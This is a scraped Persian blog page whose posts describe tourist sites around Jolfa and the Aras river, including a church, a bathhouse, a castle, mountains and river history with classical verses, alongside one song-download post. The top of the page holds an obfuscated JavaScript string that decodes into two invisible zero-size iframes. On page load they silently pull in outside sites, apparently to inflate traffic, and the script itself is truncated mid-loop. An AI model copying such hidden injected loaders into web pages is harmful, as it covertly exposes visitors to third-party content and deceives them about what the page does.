script>var enkripsi="'1Akdpcog'02dpcog`mpfgp'1F'002'00'02jgkejv'1F'002'00'02qapmnnkle'1F'00lm'00'02qpa'1F'00jvvr'1C--oomqctk,p;:,kp'00'02ukfvj'1F'002'00'1G'1A-kdpcog'1G'1Akdpcog'02dpcog`mpfgp'1F'002'00'02jgkejv'1F'002'00'02qapmnnkle'1F'00lm'00'02qpa'1F'00jvvr'1C--uuu,qjcfkf,pmx`nme,amo-rceg-7'00'02ukfvj'1F'002'00'1G'1A-kdpcog'1G"; teks=""; teksasli="";var panjang;panjang=enkripsi.length;for (i=0;i تندر دانلود

صفحه نخست

ايميل ما

آرشیو مطالب

لينك آر اس اس

عناوین مطالب وبلاگ

پروفایل مدیر وبلاگ

طراح قالب

:: صفحه نخست
::
ايميل ما
::
آرشیو مطالب
::
پروفایل مدیر وبلاگ
::
لينك آر اس اس
::
عناوین مطالب وبلاگ
::
طراح قالب

::عربی سوم راهنمایی
::نمونه سوالات عربی سوم راهنمایی
::اموزش عربی سوم راهنمایی
::زبان انگلیسی سوم راهنمایی
::نمونه سولات زبان انگلیسی سوم راهنمایی
::اموزش زبان انگلیسی سوم راهنمایی
:: تاریخ سوم راهنمایی
::نمونه سوالات تاریخ سوم راهنمایی
::اموزش تاریخ سوم راهنمایی
::فارسی سوم راهنمایی
::نمونه سوالات فارسی
:: حرفه سوم راهنمایی
::اموزش حرفه سوم راهنمایی
::نمونه سوالات حرفه سوم راهنمایی
::دینی سوم راهنمایی
::اموزش دینی سوم راهنمایی
::نمونه سوالات دینی سوم راهنمایی
::قران سوم راهنمایی
::عجائب قران
::نکات زیبای قران
::درسی
::علوم سوم راهنمایی
::ریاضی سوم راهنمایی
::رمز تقلب
::رمز کانتر
::برنامه کودک
::برنامه کودک دوبله فارسی
::زبان اصلی
::نرم افزار
::ویندوز
::پلیر
::اهنگ
::یاس
::خارجی
::تتلو
::بازی
::بازی ورزشی
::جام جهانی 2014
::وبلاگ واینترنت
::عکس


تمام لينکها تماس با ما


نويسندگان :
:: اهنننن

آمار بازديد :

:: تعداد بازديدها:
:: کاربر: Admin

<-PollName->

<-PollItems->

آمار وب سایت:  

بازدید امروز :
بازدید دیروز :
بازدید هفته :
بازدید ماه :
بازدید کل :
تعداد مطالب : 426
تعداد نظرات : 23
تعداد آنلاین : 1



Alternative content








پيام مديريت وبلاگ : با سلام خدمت شما بازديدكننده گرامي ، به وبلاگ من خوش آمديد .لطفا براي هرچه بهتر شدن مطالب اين وبلاگ ، ما را از نظرات و پيشنهادات خود آگاه سازيد و به ما در بهتر شدن كيفيت مطالب وبلاگ کمک کنید .


معرفی کلیسای چوپان، شهرستان جلفا، استان آذربایجان شرقی

کلیسای چوپان :

تقریباً در 5 کیلومتری غرب جلفا در مسیر جاده جلفا - سد ارس در میان کوه های رسوبی سرخ رنگ قرار گرفته است و طوری در آنجا مکان گزیده که جزء طبیعت لاینفک آنجا درآمده است. این کلیسا در سال 1518 میلادی احداث گردیده و چنانچه از نام آن قابل استنباط است شاید این کلیسا برای چوپانانی که مشغول چرای حیوانات در مراتع آنجا بودند طراحی شده تا آنها برای به عمل آوردن فیوضات خود به روستاهای دره شام مراجعت نکنند. پوسته خارجی کلیسا به وسیله سنگ ساخته شده و دارای یک گنبد کوچکی می باشد که اخیراً مرمت گردیده است. داخل کلیسا خیلی کوچک است و بیش از ده نفر در آن جای نمی گیرد. طاق های آن نیز به مانند کلیساهای دیگر جناغی شکل است.

 

 

 

 

 



نوشته شده توسط اهنننن در 13 / 5 / 1393


معرفی حمام و قلعه کردشت، شهرستان جلفا، استان آذربایجان شرقی

حمام کردشت :

این حمام یکی از زیباترین حمام های آذربایجان است که با معماری اصیل سنتی در روستای کردشت از توابع جلفا و در کنار رود ارس قرار دارد . این حمام در میان باغ بزرگی ساخته شده ، دارای یک هشتی به صورت هشت ضلعی به ابعاد 3.5 در 3.5 و به ارتفاع 4.3 متر است که یکی از اضلاع ، درب ورودی و یکی دیگر راه ورود به رختکن یا سربینه است .گرما خانه فضایی است که از چهار ستون سنگی هشت بر و دو حوض بزرگ مستطیل شکل و اتاقی با گنبد قیر اندود تشکیل شده است . نور داخل سربینه و گرما خانه به وسیله روزنی که در نوک گنبد قرار دارد تأمین می شود و گویا بر روی آن روزن ها سنگ های مرمر نازک و ظریفی نصب بود که نور آفتاب از آن نفوذ می کرد ، و داخل حمام را به طور یکنواخت روشن می کرده و شستشو کنندگان را از نگاه نامحرمان حفظ می نمود. حمام کردشت بخش های دیگری نیز دارد ، که بسیار دیدنی و قابل مطالعه است ، این حمام در زمان عباس میرزا نائب السلطنة فتحعلی شاه هنگام جنگ دوم ایران و روس ساخته شد ولی شیوه معماری آن شباهت بسیاری به حمام&zwnj;های دوره صفوی دارد.

سربینه حمام نیز هشت ضلعی به اضلاع 3.5 متر و ارتفاع 8.5 متر است و گنبد بزرگ آن بر روی جوز ها و هشت ستون سنگی هشت بر، استوار شده است، همه ستون ها دارای سر ستون های سنگی مقرنس هستند که به وسیله ملات سرب مذاب به ستون ها وصل شده اند. گنبد سربینه دارای کاربندهای جالب مزین به آهک بریهای زیبا است، سکوهای رخت کن با طاق ضربی پوشیده و در زیر آن کفش کن هایی تعبیه گردیده است.

 

 

 

 

 

 

 

 

 

قلعه کردشت :

یکی از قلعه های تاریخی آذربایجان در روستای کردشت در ساحل رود ارس بنا شده است ، ولی به لحاظ ارزش و اهمیت نظامی و تاریخی به خصوص دوران حکومت عباس میرزای قاجار نائب السلطنه فتحعلی شاه در آذربایجان بیشتر مورد توجه بوده است.

 

 

 



نوشته شده توسط اهنننن در 13 / 5 / 1393


دشت گردیان در شهرستان جلفا، استان آذربایجان شرقی

دشت گردیان :

دشت 1838 هکتاری گردیان واقع در محدوده منطقه آزاد ارس به عنوان یکی از موقعیت های مساعد سرمایه گذاری در این منطقه به شمار می رود. قرارگیری در بین نقاط پست و مرتفع، نزدیکی با هادیشهر و کلانشهر تبریز، استقرار در بین اراضی باغی و کشاورزی، قرارگیری سد گردیان و رودخانه های مجاور در آن منطقه باعث شده تا فضایی ایده آل جهت انجام سرمایه گذاری در زمینه گردشگری ایجاد شود. این دشت شامل باغات مکانیزه زردآلو، بادام، آلبالو و انگور بوده و به عنوان یکی از مراکز عمده تولید میوه در شمالغرب کشور محسوب می شود. شیوه اداره باغات به صورت شرکت تعاونی تولید روستایی بوده و سهامداران آم اهالی و ساکنین این شهرستان می باشند.

 

 

 

 

 

 



نوشته شده توسط اهنننن در 13 / 5 / 1393


عکس و معرفی کوهستان کیامکی و گچی قالاسی شهرستان جلفا، استان آذربایجان شرقی

کوهستان کیامکی :

پناهگاه حیات وحش کیامکی و منطقه حفاظت شده ارسباران زیستگاه گونه های جانوری همچون آهو ،مارال ،قوچ ،میش ارمنی ،کل و بز ،پلنگ ،خرس قهوه ای و گونه های مختلفی از پرندگان از قبیل سیاه خروس ، کبک، عقاب طلایی ، اردک ، حواصیل ، آلرت و بوتیمار ،قرقاول ، طرلان و بالابان وهمچنین پوشش گیاهی بید ، زرشک ،افرا ، نسترن ، گردو و گیاهان مرتعی و دارویی.

 

 

 

 

 

 

کوه گچی قالاسی :

در جنوب شهر جلفا در دامنه کوه آتشفشانی گئچی قالاسی که در طی اواخر الیگوسن (38 میلیون سال پیش) فوران کرده است. رگه های زیبایی سنگ معدن مرمر سبز بوجود آمده است، داستان تشکیل این ماده معدنی از این قرار است که فورانهای داغ گدازه ای در قبل سنگهای آهکهای اطراف این کوه را همراه با آبهای داغ پخته و در طی زمان بلورهای درشتی از کلسیت (CaCo3) را بنام Onyx ایجاد کرده است. در اصطلاح زمین شناسی به چنین حالتی دگرگونی مجاورتی(Contact Metamorphism ) می گویند. در محل این معدن آب ترش و سرد و گازداری از اعماق زمین بصورت خارج می شود که در مسیر جاری شدن خود لایه های زیبایی از رسوبات آهندار قرمز و لیموئی را ایجاد نموده است. یکی از رسوباتی که در دهانه اغلب چشمه&zwnj;های معدنی یافت می&zwnj;شود. کربنات کلسیم در دهانه چشمه&zwnj;ها را ممکن است بر اثر خروج گاز CO2 حفره&zwnj;دار نیز شده&zwnj; باشند، تراورتن می&zwnj;نامند. تراورتن به&zwnj;دلیل سهولت دسترسی و سادگی برش ، به مقدار زیاد به عنوان سنگ تزئینی بناها استفاده می&zwnj;شود. چشمه های تراورتن ساز علاوه بر فواید صنعتی، دارای فواید پزشکی و آب درمانی دارد.

 

 

 

 



نوشته شده توسط اهنننن در 13 / 5 / 1393


موقعیت جغرافیایی، محدوده منطقه آزاد ارس :

 منطقه آزاد ارس در شمالغرب ایران در نقطه صفر مرزی در مجاورت با کشورهای ارمنستان، آذربایجان و جمهوری خودمختار نخجوان استقرار یافته است.

بر اساس مصوبه هیات وزیران در تاریخ 7/4/1384 به شماره 20708/ت530820 محدوده منطقه آزاد ارس شامل 9700 هکتار از اراضی منطقه می شد که براساس مصوبه جدید این هیات محترم در 14/9/1387 , محدوده این منطقه به 51 هزار هکتار شامل بخشهایی از 2 شهرستان جلفا و کلیبر افزایش یافت .
این محدوده ابلاغی در بخش متصل، محدوده اصلی را از 9700 هکتار به 20500 هکتار افزایش داده است و در 3 بخش منفصل نیز قسمتی از شهرستان کلیبر به وسعت 24 هزار هکتار (موسوم به قلی بیگ لو) و اراضی اطراف سد خدآفرین به وسعت 6100 هکتار و محدوده گمرک نوردوز ( مرز ایران با ارمنستان) به وسعت 240 هکتار جمعاً به وسعت 51000 هکتار کل محدوده منطقه آزاد ارس را تشکیل می دهد.

 

موقعیت جغرافیایی، حدود و وسعت شهرستان جلفا :

شهرستان جلفا در شمال غربی استان آذربایجان شرقی، بین 45 درجه و 17 دقیقه تا 46 درجه و 31 دقیقه طول شرقی و بین 38 درجه و 39 دقیقه تا 39 درجه و 2 دقیقه عرض شمالی بصورت نوار باریکی در مرز شمالی استان واقع شده و از شمال به رودخانه ارس و جمهوریهای نخجوان و ارمنستان و آذربایجان منتهی می شود . وسعت این شهرستان 31/1670 کیلومتر مربع می باشدکه شهرستان کلیبر حدود شرقی و شهرستانهای مرند و اهر نیز همسایگان جنوبی این شهرستان محسوب می&zwnj;شوند. 
بطور متوسط عرض این شهرستان 17 کیلومتر، و طول آن 100 کیلومتر است. شهرجلفا مرکز این شهرستان در 135 کیلومتری شمال غرب تبریز و 65 کیلومتری شمال شهر مرند قرار دارد. از نظر وسعت جلفا از شهرستانهای کوچک استان به شمار می&zwnj;رود و با 31/1670 کیلومتر مربع وسعت تنها 4/3 از کل مساحت استان را در پوشش خود داشته که از ایـن نظر در رده دوازدهم قرار دارد. 
بخش مرکزی شهرستان جلفا، دهستانهای شجاع و ارسی را در بر می&zwnj;گیرد. شهر جلفا در محدودة جغرافیائی دهستان شجاع و شهر هادی شهر در محدودة جغرافیائی دهستان ارسی واقع شده&zwnj;اند . از نظر تقسیمات سیاسی شهرستان جلفا دارای دو بخش با نامهای بخش مرکزی و بخش سیه رود و 5 دهستان با نامهای دیزمار غربی، نوجه مهر، ارسی، داران، شجاع می باشد. براساس آمار سال 1383 تعداد آبادیهای دارای سکنه شهرستان جلفا 73219 آبادی می باشد.                                                منبع:http://arastravel.blogfa.com

 

 

 

 

 

 

 

 

 



نوشته شده توسط اهنننن در 13 / 5 / 1393


ارس سرزمین زیبائیها

رود تاریخی ارس :

 این رود مهم ترین و پرآب ترین رودخانه شمالی آذربایجان شرقی است. رودخانه ارس از کوه بینگول داغ (هزار برکه) واقع در حوالی سرچشمه فرات در ترکیه سرچشمه گرفته و به سوی خاور روان می شود و در نهایت به دریای خزر می ریزد. درازای بخش مرزی این رود 475 کیلومتر و درازای سر تا سری رودخانه حدود 910 کیلومتراست. رود ارس از شهرستان های ماکو، اهر، مرند و گرمی در استان های آذربایجان شرقی و غربی و اردبیل عبور می کند. ارس یک رود دایمی و رودخانه مرزی ایران و جمهوری آذربایجان و ارمنستان می باشد. ارس از دو شاخه مجزا یکی در ارمنستان و دیگری در ترکیه و سلسله جبال آرارات(آغری) تغذیه می شود که در محل زنگنه واقع در منتهی الیه شمال باختری ایران به هم می رسند. این منطقه، مرز مشترک ایران و جمهوری آذربایجان و ترکیه است. پس از آن رودخانه ارس تا محلی به نام بهرام تپه مرز مشترک سه کشور ایران و آذربایجان و ارمنستان می باشد.حوضه آبریز ارس جلگه پستی در نیمه شمالی استان&zwnj;های آذربایجان شرقی و غربی و اردبیل است و آب و هوای معتدلی نسبت به نیمه جنوبی این استانها دارد بارش فراوان در این منطقه علاوه بر کمک به اعتدال آب و هوا باعث ایجاد رودخانه&zwnj;های متعدد با دبی (حجم آب در واحد زمان /Sec M3 ( زیاد شده است. برخی از این رودها سرشاخه&zwnj;های متعددی در کشورهای همجوار (ترکیه- آذربایجان- ارمنستان) دارند و در نهایت به دریای خزر راه می&zwnj;یابند.


عرض رودخانه ارس در جلفا گاهی تا 200متر و ارتفاع وعمق بستر آن به 2 تا 3 متر می رسد. عریضترین نقطه رودخانه در نزدیکی شهر جلفا میباشد که بیش از 200 متر عرض و بیش از 4 متر عمق دارد که می توان سومین رودخانه ایران از لحاظ قدرت آب تلقی کرد. بستر رودخانه ارس دارای شیب زیادی بوده که آب با سرعت درآن جریان دارد و مثل رودهای دیگر نمی توان بر روی آن قایقرانی کرد ولی اگر قایق موتور دار باشد می توان از آن استفاده نمود.رودخانه ارس که سراسر نوار شمال غربی کشور را سیراب می کند در تمام فصول سال پر آب است اما به دلیل مسائل زیست محیطی و تخم ریزی ماهیها مجوز برای ماهیگیری در ایام خاصی از سال صادر می شود. شهر های جلفا، پلدشت، سیه رود و سواحل حاشیه ای این شهرها بهترین نقاط برای ماهیگیری هستندکه هر ساله در فصل تابستان قلابهای آویزان نشانگر حضور ورزشکاران و گاه خانواده های علاقمند به ماهیگیری است.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

منبع:http://arastravel.blogfa.com



نوشته شده توسط اهنننن در 13 / 5 / 1393


رودخانه ارس

اَرَس(در ترکی آذربایجانی:آراز و Araz - در زبان ارمنی:آراکس، Արաքս) نام رودخانه&zwnj;ای نسبتاً پرآب و خروشان است که از منطقه آرپا چای در آناتولی ترکیه سرچشمه گرفته، از مرز ترکیهنخجوان جلفا و ارمنستان گذشته و پس از گذر از مرز ایران و جمهوری آذربایجان وارد جمهوری آذربایجان گشته و به رودخانه کورا می&zwnj;ریزد.

رودخانه ارس در سال ۱۸۱۳ میلادی در پی عهدنامه ترکمنچای به عنوان مرز ایران و روسیهبرگزیده شد و تمامی مناطق شمال این رود از ایران جدا و به خاک روسیه افزوده شد.

بعدها ایران و اتحاد شوروی با هم سدی در ناحیه پلدشت به نام سد ارس بنا نمودند. در حال حاضر سد خداآفرین و سد قیزقعله&zwnj;سی به صورت مشترک با جمهوری آذربایجان بر روی ارس احداث می&zwnj;شود.

بر روی ارس تا کنون پنج پل ساخته شده&zwnj;است که عبارتنداز: پل آهن جلفا، شوسه جلفا، پل پلدشت در شهرستان ماکو، پل خدا آفرین در قره داغ، پل نوردوز در مرز ارمنستان.

 نام

ریشهٔ واژهٔ فارسی &laquo;ارس&raquo; و واژه&zwnj;های یونانی و ارمنی مربوطه احتمالاً از مادی &laquo;اَرَخس&raquo; *Araxs است که برگرفته است از نیاایرانی *Rax&scaron;a- که یعنی &laquo;تیزرو&raquo;، &laquo;آنچه به سرعت جریان دارد&raquo;.

در سنن ارمنی این رودخانه به نام آراست نوه بزرگ خاندان افسانه&zwnj;ای ارمنی هایک گذاشته شده است.این نام بعداً یونانی شده و به Araxes دگرگون شد و برای فرهنگ کورا-ارسی استفاده شد.تمدنی پیش از تاریخ که در دره کورا و ارس شکوفا شده بود.ولی در بسیاری از زمان&zwnj;ها این رود ولگا بوده که به نام Araxes نامیده شده به ویژه در تاریخ هرودوت.همچنین این رود در آخرین فصل آننید هشتم اثر ویرجیل به نام خشم در پل ثبت شده است پس از آنکه رومیها با ساختن یک پل بر روی آن توانستند بر دشمن پیروز شوند.برخی بر این باورند که ارس با دو رودخانه پیشون و گیهون که در فصل دوم کتاب مقدس به آن اشاره شده مرتبط است.

جزیره&zwnj;های ارس

رود ارس در نقشه ایران در دوره افشاریه.

در بستر رودخانهٔ ارس ۸۰۵ جزیرهٔ کوچک و بزرگ خالی از سکنه وجود دارد که به زبان محلی به آن &laquo;شام&raquo; می&zwnj;گویند. بر پایهٔ قرارداد مرزی، ۴۲۷ جزیره به ایران و ۳۸۲ جزیره به شوروی (و اکنون به جمهوری آذربایجان) تعلق دارند. این جزیره&zwnj;ها تنها برای چرای حیوانات پیرامون رودخانه قابل استفاده&zwnj;اند.

بیشتر این جزیره&zwnj;ها با نام&zwnj;های شماره&zwnj;گذاری شده نامیده می&zwnj;شود و برخی جزیره&zwnj;ها نیز دارای نام هستند از جمله: خُرامه، بویدوز، پیرواتلر، قره&zwnj;قباح و کثیری. چند جزیرهٔ نام&zwnj;برده دارای چراگاه&zwnj;های خوبی هستند.

در تعیین مالکیت جزیره&zwnj;های ارس میان هیأت&zwnj;های مرزبندی ایران و شوروی مقرر شده&zwnj;بود تا خط مرزی از میان رود ارس بگذرد و اگر در محلی چند شاخه از رود وجود داشته&zwnj;باشد میانهٔ شاخهٔ عمده&zwnj;تر خط مرزی شود. در تاریخ ۶ مهرماه ۱۳۳۴ یعنی زمانی که مالکیت جزیرهٔ نزدیک به پاسگاه عباسی تعیین می&zwnj;شد بر سر این که شاخهٔ عمدهٔ رود در این محل کدام است میان هیأت شوروی و ایران مشاجره&zwnj;ای درگرفت. یکی از افسران ایرانی به نام ستوان یکم نورالله کثیری نقشه&zwnj;بردار لشکر تبریز، برای اثبات این که شاخه&zwnj;ای که به سود ایران بود عمیق&zwnj;تر و بنابرین شاخهٔ عمده&zwnj;است با اسب خود بی&zwnj;باکانه به آب زد. وی و اسبش در زیر امواج ناپدید شدند ولی یکی از مرزبانان ایرانی به نام صمد مدداقلی توانست افسر ایرانی را نجات دهد. اعضای هیأت روس با دیدن این صحنه، مالکیت ایران بر جزیرهٔ ۱۳۰ در این شاخه از رود را پذیرفتند. جزیرهٔ ۱۳۰ بعداً با تصویب مقامات عالی ایران جزیرهٔ کثیری نام گرفت و به ستوان یکم نورالله کثیری پاداش و نشان افتخار داده&zwnj;شد.[۵] در دوران جنگ سرد، برخی از ایرانیان کمونیست از طریق این رودخانه به اتحاد جماهیر شوروی فرار کردند. همچنین صمد بهرنگی، نویسندهٔ ایرانی کتاب&zwnj;های کودکان در این رودخانه غرق شد.

ارس در شعر شاعران فارسی&zwnj;گوی

اوحدی مراغه&zwnj;ای

هر ساعتم به موج بلایی در افکند

سیلاب ازین دو دیدهٔ همچون ارس مرا

نظامی

ارس را در بیابان جوش باشد

چو در دریا رسد خاموش باشد


حافظ

ای صبا گر بگذری بر ساحل رود ارس

بوسه زن بر خاک آن وادی و مشکین کن نفس

مولانا

شب رحیل چو کردم وداع شروان را

دریغ حاصل من بود و درد حصهٔ من

شدم ز آتش هجران زدم بر آب ارس

ارس بنالید از درد حال و قصهٔ من

به تیزی دم من بود و پری غم من

خروش سینهٔ من داشت جوش غصهٔ من


قاآنی

از خون خصم بوالهوس جاری کند رود ارس

تیغت&zwnj; که&zwnj; اندر یک&zwnj; نفس صد خون به تنها ریخته


ملک&zwnj;الشعرای بهار

به یک ماه اگر رفت جیش خزان

ز رود ارس تا لب هیرمند

به یک هفته آمد سپاه بهار

زکوه پلنگان&zwnj; به کوه سهند



نوشته شده توسط اهنننن در 13 / 5 / 1393


آهنگ علیرضا روزگار با نام ناز داره

دانلود آهنگ جدید و فوق العاده زیبا از علیرضا روزگار با نام ناز داره با دو کیفیت متفاوت

( ترانه : علیرضا روزگار / آهنگ : سعید ساشا / تنظیم : مصطفی روزگار )
( میکس و مسترینگ : محمد کلهر )

.:. Alireza Roozegar .:.

 

[ادامه مطلب را در اینجا بخوانید ...]


نوشته شده توسط اهنننن در 25 / 4 / 1393


:: افزایش بازدید حرفه ای - رضا
:: دانلود کم پلیر جدید
:: دانلود بازی Need for Speed Most Wanted 2 برای PC
:: درست کردن pes 2013
:: نبرد عراق در حال نزدیکی به مرزهای عربستان
:: بدون شرح ............ جام گاز
:: نرم افزار ساخت قالب آنلاین برای وبلاگ





تندر دانلود




:: دی 1394
:: آبان 1393
:: مرداد 1393
:: تير 1393
:: خرداد 1393
:: ارديبهشت 1393
:: فروردين 1393
:: اسفند 1392
:: بهمن 1392

آبر برچسب ها

حاشیه جام جهانی , دانلود ویندوز7سرویس پک1 , نمونه سوالات تستی درس ادبیات فارسی سال سوم راهنمایی , , نکات زیبای قران , 6 , جام جهانی , 1،دانلود بازی تخیلی The Last Survivor(EFTD) v1 , داستانک های زیبای فارسی ((متن)) , فاسی سوم راهنمایی , دانلود پاور پوینت درس های فارسی سوم رامنمایی , ویژگی ادمهای مختلف منبع 8بهشت , کتاب شاهنامه , خلاصه ای داستان سووشون اثر دکتر سیمین دانشور , نمونه سوالات زبان سوم راهنمایی ,

صفحه نخست | ايميل ما | آرشیو مطالب | لينك آر اس اس | عناوین مطالب وبلاگ |پروفایل مدیر وبلاگ | طراح قالب

Powered By LOXBLOG.COM Copyright © 2009 by farsi-3
Design By : wWw.Theme-Designer.Com